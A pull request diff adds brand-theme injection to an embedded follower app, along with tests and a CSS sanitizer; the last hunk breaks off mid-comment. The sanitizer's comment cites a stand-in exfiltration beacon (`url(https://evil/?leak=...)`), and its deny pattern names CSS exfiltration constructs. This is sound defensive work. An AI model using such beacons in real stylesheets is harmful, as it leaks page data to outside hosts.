### PR TITLE
feat(cherry): theme injection for embedded follower

### DIFF
--- a/packages/cherry/CLAUDE.md
+++ b/packages/cherry/CLAUDE.md
@@ -60,12 +60,15 @@ disableShader?, components? }`) that the SDK serializes as JSON in the
   overriding its default appearance. Static — resolved at mount time; there is no
   runtime re-theme. The `examples/host.html` harness includes a dropdown with
   hardcoded brand presets, plus a custom-JSON textarea, for manual testing.
-  **Trust boundary:** `theme.tokens` values and `theme.css` are injected into a
-  `<style>` element in the follower with no sanitization beyond a shape check —
-  a malicious host page could inject arbitrary CSS into the follower it embeds.
-  This mirrors the existing cherry trust model (the host already controls
-  `capabilities.navigate`/`openUrl` and runs its own page's code), so only mount
-  against a host page you trust.
+  **CSS-injection guard:** `theme.tokens`, `theme.css`, and every `components`
+  property flow through `sanitizeTheme` (`packages/webapp/src/ui/theme-engine.ts`)
+  before reaching the follower's `<style>` element — any value containing
+  `url(`, `@import`, `expression(`, `javascript:`, angle brackets, or a call to
+  a CSS function outside a small allowlist (`rgb`/`rgba`/`hsl`/`hsla`/`hwb`/
+  `var`/`calc`/`clamp`/`min`/`max`) is dropped rather than partially escaped.
+  This blocks the classic CSS-exfiltration vector (a host beaconing DOM state
+  out via a themed `url(...)`) without requiring the host page itself to be
+  trusted.
 - `HostCapabilities.screenshot` is `'html2canvas' | 'none'` — a strategy, not a
   boolean. The host SDK lazily `import()`s `html2canvas` only when a screenshot
   is requested under the `'html2canvas'` strategy.

--- a/packages/cherry/CLAUDE.md
+++ b/packages/cherry/CLAUDE.md
@@ -55,11 +55,17 @@ mountSlicc({
   Separate from `capabilities` (which gates agent _powers_ over the host page);
   features gate _UI surfaces_ shown to the user.
 - `theme` accepts a `SliccTheme` object (`{ id, name, base, tokens, css?,
-  disableShader?, components? }`) that the SDK serializes as JSON in the
+disableShader?, components? }`) that the SDK serializes as JSON in the
   handshake welcome. The follower applies it on boot via `applyCherryTheme`,
   overriding its default appearance. Static — resolved at mount time; there is no
   runtime re-theme. The `examples/host.html` harness includes a dropdown with
-  hardcoded brand presets for manual testing.
+  hardcoded brand presets, plus a custom-JSON textarea, for manual testing.
+  **Trust boundary:** `theme.tokens` values and `theme.css` are injected into a
+  `<style>` element in the follower with no sanitization beyond a shape check —
+  a malicious host page could inject arbitrary CSS into the follower it embeds.
+  This mirrors the existing cherry trust model (the host already controls
+  `capabilities.navigate`/`openUrl` and runs its own page's code), so only mount
+  against a host page you trust.
 - `HostCapabilities.screenshot` is `'html2canvas' | 'none'` — a strategy, not a
   boolean. The host SDK lazily `import()`s `html2canvas` only when a screenshot
   is requested under the `'html2canvas'` strategy.

--- a/packages/cherry/CLAUDE.md
+++ b/packages/cherry/CLAUDE.md
@@ -36,6 +36,7 @@ mountSlicc({
   sliccOrigin, // origin serving the worker-hosted webapp, e.g. https://app.sliccy.ai
   capabilities, // { navigate: boolean; screenshot: 'html2canvas' | 'none'; openUrl: boolean }
   features, // { terminal?, files?, memory?, browser?, modelPicker?, history?, nav?, newSprinkle?, monitor? } — all default true
+  theme, // SliccTheme object — optional brand theme applied inside the follower (serialized in handshake welcome)
   hooks, // { onOpenUrl?, onSliccEvent?, onPermissionRequest?, onHandshakeComplete? }
   joinToken, // REQUIRED: existing tray join URL the host (or its backend) provisioned
 }): SliccHandle; // { iframe, emitHostEvent(name, detail?), destroy() }
@@ -53,6 +54,12 @@ mountSlicc({
   at mount time and sent in `handshake.welcome`; there is no runtime toggle.
   Separate from `capabilities` (which gates agent _powers_ over the host page);
   features gate _UI surfaces_ shown to the user.
+- `theme` accepts a `SliccTheme` object (`{ id, name, base, tokens, css?,
+  disableShader?, components? }`) that the SDK serializes as JSON in the
+  handshake welcome. The follower applies it on boot via `applyCherryTheme`,
+  overriding its default appearance. Static — resolved at mount time; there is no
+  runtime re-theme. The `examples/host.html` harness includes a dropdown with
+  hardcoded brand presets for manual testing.
 - `HostCapabilities.screenshot` is `'html2canvas' | 'none'` — a strategy, not a
   boolean. The host SDK lazily `import()`s `html2canvas` only when a screenshot
   is requested under the `'html2canvas'` strategy.

--- a/packages/cherry/examples/host.html
+++ b/packages/cherry/examples/host.html
@@ -117,6 +117,19 @@
         <span class="hint">Uncheck to hide a panel in the embedded follower.</span>
       </div>
       <div class="row">
+        <label for="theme">theme</label>
+        <select id="theme">
+          <option value="none" selected>none (default)</option>
+          <option value="vanilla">Vanilla (light)</option>
+          <option value="midnight-scoop">Midnight Scoop (dark)</option>
+          <option value="matcha-float">Matcha Float (dark)</option>
+          <option value="berry-cone">Berry Cone (dark)</option>
+          <option value="caramel-swirl">Caramel Swirl (light)</option>
+          <option value="sorbet">Sorbet (light)</option>
+        </select>
+        <span class="hint">Applies a brand theme inside the embedded follower (fixed at mount time).</span>
+      </div>
+      <div class="row">
         <label for="evtName">send event</label>
         <input id="evtName" type="text" placeholder="event name (e.g. checkout-done)" />
         <input id="evtDetail" type="text" placeholder='detail JSON (optional, e.g. {"id":7})' />
@@ -163,6 +176,83 @@
       // this bare specifier to the local build.)
       import { mountSlicc } from '@ai-ecoverse/cherry';
 
+      // Hardcoded theme presets (subset of webapp theme-presets.ts) so the
+      // harness can exercise theme injection without importing webapp internals.
+      const THEME_PRESETS = {
+        vanilla: {
+          id: 'vanilla', name: 'Vanilla', base: 'light', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#fffdf8', '--s2-bg-layer-1': '#faf6f0',
+            '--s2-bg-layer-2': '#f5f0e8', '--s2-bg-elevated': '#ede7dc',
+            '--s2-accent': '#a0522d', '--s2-accent-hover': '#8b4513',
+            '--slicc-cone': '#d2691e', '--s2-border-default': '#d4cbbf',
+            '--canvas': '#fffdf8', '--bg': '#f5f0e8', '--ink': '#1a1008',
+            '--txt-2': '#6b5f50', '--txt-3': '#8c7f6f', '--line': '#d4cbbf',
+            '--ctx': '#a0522d', '--shaderbg': '#fffdf8',
+          },
+        },
+        'midnight-scoop': {
+          id: 'midnight-scoop', name: 'Midnight Scoop', base: 'dark', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#0d1117', '--s2-bg-layer-1': '#131a24',
+            '--s2-bg-layer-2': '#1a2332', '--s2-bg-elevated': '#212d40',
+            '--s2-accent': '#58a6ff', '--s2-accent-hover': '#79b8ff',
+            '--slicc-cone': '#f0883e', '--s2-border-default': '#3a4a63',
+            '--canvas': '#0d1117', '--bg': '#080c12', '--ink': '#e8eef5',
+            '--txt-2': '#8899b3', '--txt-3': '#6b7f99', '--line': '#3a4a63',
+            '--ctx': '#58a6ff', '--shaderbg': '#0d1117',
+          },
+        },
+        'matcha-float': {
+          id: 'matcha-float', name: 'Matcha Float', base: 'dark', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#0f1a14', '--s2-bg-layer-1': '#14221b',
+            '--s2-bg-layer-2': '#1a2d23', '--s2-bg-elevated': '#21382c',
+            '--s2-accent': '#6bce9a', '--s2-accent-hover': '#88dbb0',
+            '--slicc-cone': '#a8d86c', '--s2-border-default': '#3a5c48',
+            '--canvas': '#0f1a14', '--bg': '#0a120e', '--ink': '#e8f2ec',
+            '--txt-2': '#88b09c', '--txt-3': '#6b9480', '--line': '#3a5c48',
+            '--ctx': '#6bce9a', '--shaderbg': '#0f1a14',
+          },
+        },
+        'berry-cone': {
+          id: 'berry-cone', name: 'Berry Cone', base: 'dark', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#150a1a', '--s2-bg-layer-1': '#1e1024',
+            '--s2-bg-layer-2': '#281830', '--s2-bg-elevated': '#33203d',
+            '--s2-accent': '#e06be0', '--s2-accent-hover': '#e88ae8',
+            '--slicc-cone': '#ff6b9d', '--s2-border-default': '#574063',
+            '--canvas': '#150a1a', '--bg': '#0f0614', '--ink': '#f0e8f4',
+            '--txt-2': '#a88cb3', '--txt-3': '#8c7099', '--line': '#574063',
+            '--ctx': '#e06be0', '--shaderbg': '#150a1a',
+          },
+        },
+        'caramel-swirl': {
+          id: 'caramel-swirl', name: 'Caramel Swirl', base: 'light', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#fdf9f3', '--s2-bg-layer-1': '#f8f2e8',
+            '--s2-bg-layer-2': '#f2eadd', '--s2-bg-elevated': '#e8dfd0',
+            '--s2-accent': '#c87830', '--s2-accent-hover': '#b06828',
+            '--slicc-cone': '#e89040', '--s2-border-default': '#d0c3b0',
+            '--canvas': '#fdf9f3', '--bg': '#f2eadd', '--ink': '#1a1408',
+            '--txt-2': '#6b5a42', '--txt-3': '#8f7a60', '--line': '#d0c3b0',
+            '--ctx': '#c87830', '--shaderbg': '#fdf9f3',
+          },
+        },
+        sorbet: {
+          id: 'sorbet', name: 'Sorbet', base: 'light', disableShader: true,
+          tokens: {
+            '--s2-bg-base': '#fff8f6', '--s2-bg-layer-1': '#fef0ed',
+            '--s2-bg-layer-2': '#fce8e3', '--s2-bg-elevated': '#f8ddd6',
+            '--s2-accent': '#e86050', '--s2-accent-hover': '#d04840',
+            '--slicc-cone': '#ff7860', '--s2-border-default': '#e8c0b8',
+            '--canvas': '#fff8f6', '--bg': '#fce8e3', '--ink': '#1e1412',
+            '--txt-2': '#80605c', '--txt-3': '#a8807a', '--line': '#e8c0b8',
+            '--ctx': '#e86050', '--shaderbg': '#fff8f6',
+          },
+        },
+      };
+
       const logEl = document.getElementById('log');
       const log = (...parts) => {
         const line = `[${new Date().toLocaleTimeString()}] ${parts
@@ -198,12 +288,16 @@
           newSprinkle: document.getElementById('featNewSprinkle').checked,
           monitor: document.getElementById('featMonitor').checked,
         };
+        const themeId = document.getElementById('theme').value;
+        const theme = themeId !== 'none' ? THEME_PRESETS[themeId] : undefined;
         log('features', features);
+        if (theme) log('theme', theme.name);
         handle = mountSlicc({
           container: document.getElementById('mount'),
           sliccOrigin,
           capabilities: { navigate: true, screenshot, openUrl: true },
           features,
+          theme,
           joinToken,
           hooks: {
             onSliccEvent: (name, detail) => log('onSliccEvent', name, detail ?? {}),

--- a/packages/cherry/examples/host.html
+++ b/packages/cherry/examples/host.html
@@ -126,8 +126,19 @@
           <option value="berry-cone">Berry Cone (dark)</option>
           <option value="caramel-swirl">Caramel Swirl (light)</option>
           <option value="sorbet">Sorbet (light)</option>
+          <option value="custom">custom JSON…</option>
         </select>
         <span class="hint">Applies a brand theme inside the embedded follower (fixed at mount time).</span>
+      </div>
+      <div class="row" id="themeJsonRow" style="display:none;">
+        <label for="themeJson">theme JSON</label>
+        <textarea
+          id="themeJson"
+          rows="6"
+          style="flex:1;min-width:280px;font-family:ui-monospace,monospace;font-size:12px;"
+          placeholder='{"id":"my-theme","name":"My Theme","base":"dark","tokens":{"--accent":"#ff5f72"}}'
+        ></textarea>
+        <span class="hint">Paste a SliccTheme object (id, name, base, tokens, css?, components?).</span>
       </div>
       <div class="row">
         <label for="evtName">send event</label>
@@ -289,9 +300,21 @@
           monitor: document.getElementById('featMonitor').checked,
         };
         const themeId = document.getElementById('theme').value;
-        const theme = themeId !== 'none' ? THEME_PRESETS[themeId] : undefined;
+        let theme;
+        if (themeId === 'custom') {
+          const raw = document.getElementById('themeJson').value.trim();
+          if (raw) {
+            try {
+              theme = JSON.parse(raw);
+            } catch (err) {
+              log('custom theme JSON is invalid — ignoring:', err.message);
+            }
+          }
+        } else if (themeId !== 'none') {
+          theme = THEME_PRESETS[themeId];
+        }
         log('features', features);
-        if (theme) log('theme', theme.name);
+        if (theme) log('theme', theme.name || theme.id || '(custom)');
         handle = mountSlicc({
           container: document.getElementById('mount'),
           sliccOrigin,
@@ -347,6 +370,12 @@
         }
         handle.emitHostEvent(name, detail);
         log('emitHostEvent', name, detail ?? {});
+      });
+
+      const themeSelect = document.getElementById('theme');
+      const themeJsonRow = document.getElementById('themeJsonRow');
+      themeSelect.addEventListener('change', () => {
+        themeJsonRow.style.display = themeSelect.value === 'custom' ? 'flex' : 'none';
       });
 
       log('ready — paste a joinToken and press Mount.');

--- a/packages/cherry/src/index.ts
+++ b/packages/cherry/src/index.ts
@@ -5,6 +5,8 @@
 
 import { mountSliccImpl } from './mount.js';
 
+export type { SliccTheme, ThemeComponent, ThemeComponents } from './theme-types.js';
+
 export interface HostCapabilities {
   /** Allow the leader to navigate the host page top-level frame. */
   navigate: boolean;

--- a/packages/cherry/src/index.ts
+++ b/packages/cherry/src/index.ts
@@ -4,6 +4,7 @@
  */
 
 import { mountSliccImpl } from './mount.js';
+import type { SliccTheme } from './theme-types.js';
 
 export type { SliccTheme, ThemeComponent, ThemeComponents } from './theme-types.js';
 
@@ -63,6 +64,11 @@ export interface MountSliccOptions {
   hooks?: HostHooks;
   /** UI feature toggles. Omit for all panels visible. */
   features?: CherryFeatures;
+  /**
+   * Optional theme to apply inside the follower. Serialized as JSON in the
+   * handshake welcome so the follower can apply it without a round-trip.
+   */
+  theme?: SliccTheme;
   /**
    * Existing tray/session join URL the leader was provisioned with. Required:
    * the host (or its backend) supplies a ready join URL and the follower embeds

--- a/packages/cherry/src/mount.ts
+++ b/packages/cherry/src/mount.ts
@@ -94,6 +94,7 @@ export function mountSliccImpl(options: MountSliccImplOptions): CherrySliccHandl
           kind: 'handshake.welcome',
           joinUrl: options.joinToken,
           features: resolvedFeatures,
+          ...(options.theme ? { theme: JSON.stringify(options.theme) } : {}),
         };
         post(welcome);
         options.hooks?.onHandshakeComplete?.();

--- a/packages/cherry/src/mount.ts
+++ b/packages/cherry/src/mount.ts
@@ -88,13 +88,23 @@ export function mountSliccImpl(options: MountSliccImplOptions): CherrySliccHandl
           monitor: true,
           ...options.features,
         };
+        // JSON.stringify can throw on cyclic/non-serializable theme objects — a
+        // malformed theme must not take down the whole handshake.
+        let themeJson: string | undefined;
+        if (options.theme) {
+          try {
+            themeJson = JSON.stringify(options.theme);
+          } catch (err) {
+            console.warn('[cherry] options.theme is not JSON-serializable — sending no theme', err);
+          }
+        }
         const welcome: Extract<CherryEnvelope, { kind: 'handshake.welcome' }> = {
           cherry: CHERRY_PROTOCOL_VERSION,
           channelId,
           kind: 'handshake.welcome',
           joinUrl: options.joinToken,
           features: resolvedFeatures,
-          ...(options.theme ? { theme: JSON.stringify(options.theme) } : {}),
+          ...(themeJson ? { theme: themeJson } : {}),
         };
         post(welcome);
         options.hooks?.onHandshakeComplete?.();

--- a/packages/cherry/src/protocol.ts
+++ b/packages/cherry/src/protocol.ts
@@ -44,6 +44,8 @@ export interface CherryHandshakeWelcome {
     newSprinkle: boolean;
     monitor: boolean;
   };
+  /** JSON-serialized SliccTheme the follower should apply. */
+  theme?: string;
 }
 
 export interface CherryCdpRequest {

--- a/packages/cherry/src/theme-types.ts
+++ b/packages/cherry/src/theme-types.ts
@@ -1,0 +1,34 @@
+export interface ThemeComponent {
+  background?: string;
+  text?: string;
+  border?: string;
+  radius?: string;
+  padding?: string;
+  fontSize?: string;
+  fontFamily?: string;
+  shadow?: string;
+  blur?: string;
+  height?: string;
+  opacity?: string;
+}
+
+export interface ThemeComponents {
+  userBubble?: ThemeComponent;
+  assistantMessage?: ThemeComponent;
+  codeBlock?: ThemeComponent;
+  nav?: ThemeComponent;
+  composer?: ThemeComponent;
+  sidebar?: ThemeComponent;
+  dialog?: ThemeComponent;
+}
+
+export interface SliccTheme {
+  id: string;
+  name: string;
+  author?: string;
+  base: 'dark' | 'light';
+  tokens: Record<string, string>;
+  disableShader?: boolean;
+  css?: string;
+  components?: ThemeComponents;
+}

--- a/packages/cherry/tests/mount.test.ts
+++ b/packages/cherry/tests/mount.test.ts
@@ -171,6 +171,53 @@ describe('mountSliccImpl', () => {
     handle.destroy();
   });
 
+  it('serializes options.theme as JSON in the handshake.welcome envelope', async () => {
+    const container = document.createElement('div');
+    const posted: { kind?: string; theme?: string }[] = [];
+    const theme = {
+      id: 'acme-dark',
+      name: 'Acme Dark',
+      base: 'dark' as const,
+      tokens: { '--bg': '#111', '--fg': '#eee' },
+    };
+    const handle = mountSliccImpl({
+      container,
+      sliccOrigin: 'https://app.example',
+      capabilities: { navigate: true, screenshot: 'none', openUrl: true },
+      joinToken: 'https://app.example/join?t=X',
+      theme,
+      __test_post: (env) => posted.push(env as never),
+    });
+    await handle.__test_receive({
+      cherry: 1,
+      channelId: 'ch-theme',
+      kind: 'handshake.hello',
+    } as never);
+    const welcome = posted.find((e) => e.kind === 'handshake.welcome');
+    expect(welcome?.theme).toBe(JSON.stringify(theme));
+    handle.destroy();
+  });
+
+  it('omits theme from the welcome envelope when options.theme is undefined', async () => {
+    const container = document.createElement('div');
+    const posted: { kind?: string; theme?: string }[] = [];
+    const handle = mountSliccImpl({
+      container,
+      sliccOrigin: 'https://app.example',
+      capabilities: { navigate: true, screenshot: 'none', openUrl: true },
+      joinToken: 'https://app.example/join?t=X',
+      __test_post: (env) => posted.push(env as never),
+    });
+    await handle.__test_receive({
+      cherry: 1,
+      channelId: 'ch-no-theme',
+      kind: 'handshake.hello',
+    } as never);
+    const welcome = posted.find((e) => e.kind === 'handshake.welcome');
+    expect(welcome?.theme).toBeUndefined();
+    handle.destroy();
+  });
+
   it('emitHostEvent drops (with a warning) before the handshake completes', () => {
     const container = document.createElement('div');
     const posted: unknown[] = [];

--- a/packages/webapp/src/cdp/cherry-host-protocol.ts
+++ b/packages/webapp/src/cdp/cherry-host-protocol.ts
@@ -34,6 +34,8 @@ export interface CherryHandshakeWelcome {
     newSprinkle: boolean;
     monitor: boolean;
   };
+  /** JSON-serialized SliccTheme the follower should apply. */
+  theme?: string;
 }
 
 export interface CherryCdpRequest {

--- a/packages/webapp/src/cdp/cherry-host-transport.ts
+++ b/packages/webapp/src/cdp/cherry-host-transport.ts
@@ -73,6 +73,7 @@ export class CherryHostTransport implements CDPTransport {
     newSprinkle: true,
     monitor: true,
   };
+  private _theme: string | null = null;
   private boundHandler = (ev: MessageEvent) => this.handleMessage(ev);
 
   /**
@@ -115,6 +116,14 @@ export class CherryHostTransport implements CDPTransport {
     monitor: boolean;
   } {
     return this._features;
+  }
+
+  /**
+   * JSON-serialized SliccTheme from the host SDK's handshake.welcome.
+   * Null when the host did not supply a theme.
+   */
+  get theme(): string | null {
+    return this._theme;
   }
 
   async connect(options?: CDPConnectOptions): Promise<void> {
@@ -386,6 +395,7 @@ export class CherryHostTransport implements CDPTransport {
         }
         this._state = 'connected';
         this._joinUrl = env.joinUrl ?? null;
+        this._theme = env.theme ?? null;
         this._features = env.features ?? {
           terminal: true,
           files: true,

--- a/packages/webapp/src/ui/theme-engine.ts
+++ b/packages/webapp/src/ui/theme-engine.ts
@@ -14,6 +14,124 @@ import type {
 
 const log = createLogger('theme-engine');
 
+// --- CSS sanitization ---
+//
+// Theme JSON (tokens, css, component properties) can originate from an
+// untrusted source: a local `import theme` paste, or — for `applyCherryTheme`
+// — the host page of a cherry embed. Both paths funnel into a `<style>`
+// element, so a permissive value would let the author beacon data out via
+// `url(https://evil/?leak=...)` / `@import` (classic CSS-exfiltration), or
+// smuggle `expression()`/`javascript:` in legacy engines. Every value is
+// validated against a narrow allowlist before it reaches the stylesheet;
+// anything that doesn't match is dropped rather than partially escaped, since
+// partial escaping of CSS is easy to get wrong.
+
+/** Matches the dangerous constructs we reject outright, case-insensitively. */
+const UNSAFE_CSS_PATTERN = /url\s*\(|@import|expression\s*\(|javascript:|[<>]/i;
+
+/**
+ * A single CSS value (custom property value, or one declaration's RHS).
+ * Allows: hex colors, plain numbers + common units, a small keyword
+ * character set, and calls to the specific CSS functions in
+ * `SAFE_CSS_FUNCTION_NAMES` — the vocabulary `deriveTokens` and typical theme
+ * JSON actually produce. Rejects anything containing `url(`, `@import`,
+ * `expression(`, `javascript:`, angle brackets, or a call to any function not
+ * on the allowlist.
+ */
+const SAFE_CSS_VALUE = /^[a-zA-Z0-9#%.,()\-\s]*$/;
+const CSS_FUNCTION_CALL = /([a-zA-Z-]+)\s*\(/g;
+const SAFE_CSS_FUNCTION_NAMES = new Set([
+  'rgb',
+  'rgba',
+  'hsl',
+  'hsla',
+  'hwb',
+  'var',
+  'calc',
+  'clamp',
+  'min',
+  'max',
+]);
+
+/** True when `value` is a plain, safe CSS value with no escape-hatch constructs. */
+function isSafeCssValue(value: string): boolean {
+  if (typeof value !== 'string' || value.length === 0 || value.length > 200) return false;
+  if (UNSAFE_CSS_PATTERN.test(value)) return false;
+  if (!SAFE_CSS_VALUE.test(value)) return false;
+  for (const match of value.matchAll(CSS_FUNCTION_CALL)) {
+    if (!SAFE_CSS_FUNCTION_NAMES.has(match[1].toLowerCase())) return false;
+  }
+  return true;
+}
+
+/** Sanitize a token map: drop any entry whose value fails `isSafeCssValue`. */
+function sanitizeTokens(tokens: Record<string, string>): Record<string, string> {
+  const safe: Record<string, string> = {};
+  for (const [key, value] of Object.entries(tokens)) {
+    if (isSafeCssValue(value)) safe[key] = value;
+    else log.warn('dropping unsafe theme token value', { key });
+  }
+  return safe;
+}
+
+/**
+ * `fontFamily` is the one component property that isn't a plain CSS value —
+ * it's a comma-separated list of family names. Allow letters, digits, spaces,
+ * hyphens, commas, and quotes; nothing else (blocks `url(...)` local()
+ * references and any other function call).
+ */
+const SAFE_FONT_FAMILY = /^[a-zA-Z0-9\s,'"-]{1,200}$/;
+
+/** Sanitize one `ThemeComponent`: drop any property with an unsafe value. */
+function sanitizeComponent(component: ThemeComponent): ThemeComponent {
+  const safe: ThemeComponent = {};
+  for (const [key, value] of Object.entries(component) as [keyof ThemeComponent, string][]) {
+    const ok = key === 'fontFamily' ? SAFE_FONT_FAMILY.test(value) : isSafeCssValue(value);
+    if (ok) safe[key] = value;
+    else log.warn('dropping unsafe theme component property', { key });
+  }
+  return safe;
+}
+
+/** Sanitize a full `ThemeComponents` map, component by component. */
+function sanitizeComponents(components: ThemeComponents): ThemeComponents {
+  const safe: ThemeComponents = {};
+  for (const [key, comp] of Object.entries(components) as [
+    keyof ThemeComponents,
+    ThemeComponent,
+  ][]) {
+    if (comp) safe[key] = sanitizeComponent(comp);
+  }
+  return safe;
+}
+
+/**
+ * Raw `theme.css` is free-form CSS text, not a single value — `isSafeCssValue`
+ * (which forbids `{`/`}`/`;`) doesn't apply. Instead reject the whole block if
+ * it contains any of the same dangerous constructs anywhere in the text; there
+ * is no safe partial-escape of arbitrary CSS.
+ */
+function sanitizeCustomCss(css: string | undefined): string | undefined {
+  if (!css) return undefined;
+  if (UNSAFE_CSS_PATTERN.test(css)) {
+    log.warn(
+      'dropping theme.css — contains url()/@import/expression()/javascript: or angle brackets'
+    );
+    return undefined;
+  }
+  return css;
+}
+
+/** Sanitize a full theme in place (returns a new object; input is untouched). */
+function sanitizeTheme(theme: SliccTheme): SliccTheme {
+  return {
+    ...theme,
+    tokens: sanitizeTokens(theme.tokens),
+    css: sanitizeCustomCss(theme.css),
+    components: theme.components ? sanitizeComponents(theme.components) : undefined,
+  };
+}
+
 /** Convert hex (#rrggbb) to [h, s, l] where h is 0-360, s and l are 0-1. */
 export function hexToHsl(hex: string): [number, number, number] {
   const r = parseInt(hex.slice(1, 3), 16) / 255;
@@ -267,16 +385,21 @@ function generateComponentCss(components: ThemeComponents): string {
  * custom CSS the theme supplies. Shared by `applyThemeOverrides` (local themes)
  * and `applyCherryTheme` (host-supplied themes via the cherry SDK) so the two
  * paths can't drift.
+ *
+ * Sanitizes the theme first (see `sanitizeTheme`) — both callers accept
+ * externally-authored JSON, so this is the single chokepoint that guarantees
+ * no unsafe value reaches the `<style>` element regardless of entry point.
  */
 function buildThemeCss(theme: SliccTheme): string {
-  const declarations = Object.entries(theme.tokens)
+  const safe = sanitizeTheme(theme);
+  const declarations = Object.entries(safe.tokens)
     .map(([k, v]) => `  ${k}: ${v};`)
     .join('\n');
-  const shaderRule = theme.disableShader
-    ? `\n.wcui-shader{display:none!important;}\nbody{background:${theme.tokens['--canvas'] || theme.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
+  const shaderRule = safe.disableShader
+    ? `\n.wcui-shader{display:none!important;}\nbody{background:${safe.tokens['--canvas'] || safe.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
     : '';
-  const componentCss = theme.components ? `\n${generateComponentCss(theme.components)}` : '';
-  const customCss = theme.css ? `\n${theme.css}` : '';
+  const componentCss = safe.components ? `\n${generateComponentCss(safe.components)}` : '';
+  const customCss = safe.css ? `\n${safe.css}` : '';
   return `:root {\n${declarations}\n}\n.dark, [data-theme="dark"] {\n${declarations}\n}${shaderRule}${componentCss}${customCss}`;
 }
 

--- a/packages/webapp/src/ui/theme-engine.ts
+++ b/packages/webapp/src/ui/theme-engine.ts
@@ -3,6 +3,7 @@
  * Pure HSL math, no external dependencies.
  */
 
+import { createLogger } from '../core/logger.js';
 import { PRESETS } from './theme-presets.js';
 import type {
   SimplifiedSlots,
@@ -10,6 +11,8 @@ import type {
   ThemeComponent,
   ThemeComponents,
 } from './theme-types.js';
+
+const log = createLogger('theme-engine');
 
 /** Convert hex (#rrggbb) to [h, s, l] where h is 0-360, s and l are 0-1. */
 export function hexToHsl(hex: string): [number, number, number] {
@@ -258,6 +261,38 @@ function generateComponentCss(components: ThemeComponents): string {
   return rules.join('\n');
 }
 
+/**
+ * Build the full CSS text for a theme: root token declarations (light + dark
+ * selectors), the shader-disable rule, per-component overrides, and any raw
+ * custom CSS the theme supplies. Shared by `applyThemeOverrides` (local themes)
+ * and `applyCherryTheme` (host-supplied themes via the cherry SDK) so the two
+ * paths can't drift.
+ */
+function buildThemeCss(theme: SliccTheme): string {
+  const declarations = Object.entries(theme.tokens)
+    .map(([k, v]) => `  ${k}: ${v};`)
+    .join('\n');
+  const shaderRule = theme.disableShader
+    ? `\n.wcui-shader{display:none!important;}\nbody{background:${theme.tokens['--canvas'] || theme.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
+    : '';
+  const componentCss = theme.components ? `\n${generateComponentCss(theme.components)}` : '';
+  const customCss = theme.css ? `\n${theme.css}` : '';
+  return `:root {\n${declarations}\n}\n.dark, [data-theme="dark"] {\n${declarations}\n}${shaderRule}${componentCss}${customCss}`;
+}
+
+/** Inject or update the shared theme `<style>` element with `css`. */
+function injectThemeStyle(css: string): void {
+  const existing = document.getElementById(STYLE_ID);
+  if (existing) {
+    existing.textContent = css;
+  } else {
+    const style = document.createElement('style');
+    style.id = STYLE_ID;
+    style.textContent = css;
+    document.head.appendChild(style);
+  }
+}
+
 export function applyThemeOverrides(): void {
   if (typeof document === 'undefined' || !document.getElementById) return;
   const id = getActiveThemeId();
@@ -281,23 +316,7 @@ export function applyThemeOverrides(): void {
     notifyThemeChanged(undefined);
     return;
   }
-  const declarations = Object.entries(theme.tokens)
-    .map(([k, v]) => `  ${k}: ${v};`)
-    .join('\n');
-  const shaderRule = theme.disableShader
-    ? `\n.wcui-shader{display:none!important;}\nbody{background:${theme.tokens['--canvas'] || theme.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
-    : '';
-  const componentCss = theme.components ? `\n${generateComponentCss(theme.components)}` : '';
-  const customCss = theme.css ? `\n${theme.css}` : '';
-  const css = `:root {\n${declarations}\n}\n.dark, [data-theme="dark"] {\n${declarations}\n}${shaderRule}${componentCss}${customCss}`;
-  if (existing) {
-    existing.textContent = css;
-  } else {
-    const style = document.createElement('style');
-    style.id = STYLE_ID;
-    style.textContent = css;
-    document.head.appendChild(style);
-  }
+  injectThemeStyle(buildThemeCss(theme));
   setShaderVisibility(!theme.disableShader);
   syncNavAccent(theme);
   syncBodyThemeMode(theme.base);
@@ -358,37 +377,29 @@ export function exportTheme(theme: SliccTheme): string {
  * Apply a SliccTheme received from a cherry host SDK. This bypasses local
  * storage (the theme is ephemeral to the cherry session) and directly injects
  * the CSS overrides. Exported for unit testing.
+ *
+ * Trust boundary: `theme.tokens` values and `theme.css` are injected into a
+ * `<style>` element with no sanitization beyond `importTheme`'s shape check —
+ * the host page can inject arbitrary CSS (`@import`, `url(...)`, `!important`
+ * overrides) into the follower it embeds. This is consistent with the rest of
+ * the cherry trust model (the host already controls `capabilities.navigate` /
+ * `openUrl` and can run arbitrary code in its own page), so mounting a cherry
+ * follower against an untrusted host is not a supported configuration.
  */
 export function applyCherryTheme(themeJson: string): void {
   if (typeof document === 'undefined') return;
   let theme: SliccTheme;
   try {
     theme = importTheme(themeJson);
-  } catch {
-    // Malformed theme from host — silently ignore so the follower still boots.
+  } catch (err) {
+    log.warn('ignoring malformed cherry theme', {
+      error: err instanceof Error ? err.message : String(err),
+    });
     return;
   }
   if (Object.keys(theme.tokens).length === 0) return;
 
-  const declarations = Object.entries(theme.tokens)
-    .map(([k, v]) => `  ${k}: ${v};`)
-    .join('\n');
-  const shaderRule = theme.disableShader
-    ? `\n.wcui-shader{display:none!important;}\nbody{background:${theme.tokens['--canvas'] || theme.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
-    : '';
-  const componentCss = theme.components ? `\n${generateComponentCss(theme.components)}` : '';
-  const customCss = theme.css ? `\n${theme.css}` : '';
-  const css = `:root {\n${declarations}\n}\n.dark, [data-theme="dark"] {\n${declarations}\n}${shaderRule}${componentCss}${customCss}`;
-
-  const existing = document.getElementById(STYLE_ID);
-  if (existing) {
-    existing.textContent = css;
-  } else {
-    const style = document.createElement('style');
-    style.id = STYLE_ID;
-    style.textContent = css;
-    document.head.appendChild(style);
-  }
+  injectThemeStyle(buildThemeCss(theme));
   setShaderVisibility(!theme.disableShader);
   syncNavAccent(theme);
   syncBodyThemeMode(theme.base);

--- a/packages/webapp/src/ui/theme-engine.ts
+++ b/packages/webapp/src/ui/theme-engine.ts
@@ -354,6 +354,47 @@ export function exportTheme(theme: SliccTheme): string {
   return JSON.stringify(theme, null, 2);
 }
 
+/**
+ * Apply a SliccTheme received from a cherry host SDK. This bypasses local
+ * storage (the theme is ephemeral to the cherry session) and directly injects
+ * the CSS overrides. Exported for unit testing.
+ */
